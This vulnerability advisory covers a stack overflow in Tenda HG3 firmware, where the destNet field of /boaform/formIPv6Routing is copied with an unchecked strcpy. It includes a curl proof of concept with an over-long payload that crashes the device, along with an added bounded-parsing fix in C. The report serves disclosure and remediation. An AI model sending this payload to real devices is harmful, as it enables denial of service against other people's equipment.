Vendor of the products: Tenda

Vendor's website: https://www.tendacn.com/

Reported by: Zhuang Haoran (1851805232@163.com)

Affected models and versions:

Tenda HG3 (HARD_VERSION=V2.0, Version: 300003070)

Firmware download address:

https://www.tendacn.com/material/show/787197496692805

Overview

A stack overflow exists in Tenda HG3 IoT devices. The vulnerability is caused by a missing parameter check, which leads to a stack overflow. Attackers can exploit this vulnerability to access internal interfaces and thereby cause a DoS on the IoT device.

Vulnerability details

When the URL is /boaform/formIPv6Routing, the handler is called through function pointers according to the formUploadConfig.


strcpy is then called without any length check.


When destNet is filled with a large number of “a” characters, the payload overwrites the return address.
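
For comparison, a bounded replacement for the unchecked strcpy on destNet. This is an added example, not code from the firmware or from the original report. The helper name parse_dest_net, the DESTNET_MAX bound and the assumption that destNet holds an IPv6 address with an optional /prefix length are illustrative.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed bound (not from the firmware): a full IPv6 address plus "/128". */
#define DESTNET_MAX (INET6_ADDRSTRLEN + 4)

/* Hypothetical helper. Returns 0 and fills addr/prefix_len, or -1 to reject. */
int parse_dest_net(const char *value, struct in6_addr *addr, int *prefix_len)
{
    char buf[DESTNET_MAX], *slash, *end;
    size_t len = 0;
    long plen = 128;              /* no "/len" suffix means a host route */

    if (value == NULL)
        return -1;
    while (len < sizeof(buf) && value[len] != '\0')
        len++;                    /* measure with a hard upper bound */
    if (len == 0 || len == sizeof(buf))
        return -1;                /* empty, or too long for buf: reject */
    memcpy(buf, value, len);      /* bounded copy replaces strcpy() */
    buf[len] = '\0';

    slash = strchr(buf, '/');
    if (slash != NULL) {
        *slash = '\0';
        if (slash[1] < '0' || slash[1] > '9')
            return -1;            /* strtol would accept sign/whitespace */
        plen = strtol(slash + 1, &end, 10);
        if (*end != '\0' || plen > 128)
            return -1;
    }
    if (inet_pton(AF_INET6, buf, addr) != 1)
        return -1;                /* not a syntactically valid IPv6 address */
    *prefix_len = (int)plen;
    return 0;
}

int main(void)
{
    char big[600];                /* constructed over-long input */
    struct in6_addr a;
    int p = 0;
    memset(big, 'a', sizeof(big) - 1);
    big[sizeof(big) - 1] = '\0';
    printf("over-long destNet: %d\n", parse_dest_net(big, &a, &p));
    return parse_dest_net("2001:db8::/64", &a, &p);
}
```
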

PoC

curl -i 'http://127.0.0.1:8088/boaform/formIPv6Routing' \
     -H 'Content-Type: application/x-www-form-urlencoded' \
     --data 'destNet=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&metric=ff:ff'

Attack Demo